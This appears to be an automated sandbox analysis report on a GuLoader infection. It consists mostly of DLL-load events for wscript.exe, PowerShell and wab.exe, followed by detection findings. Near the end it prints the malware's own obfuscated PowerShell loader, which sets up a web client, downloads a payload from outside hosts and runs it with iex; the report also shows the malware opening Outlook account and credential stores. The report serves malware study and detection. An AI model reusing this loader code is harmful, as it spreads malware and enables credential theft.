Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Stumpnser Midernes Fugtighe", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unpumicated $Inddmningdducible $Tamburmajors), (Muscologist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tidslernes222 = [AppDomain]::CurrentDomain.GetA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cestode)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Uranosphaerite, $false).DefineType($Postboy, $Seq
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Fattigfint)$global:Rudyard = [System.Text.Encoding]::ASCII.GetString($Oratorically)$global:Bestiller=$Rudyard.substring($Spidskandidaternes,$Amphitoky)<#Consultatively Kulminationer

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B 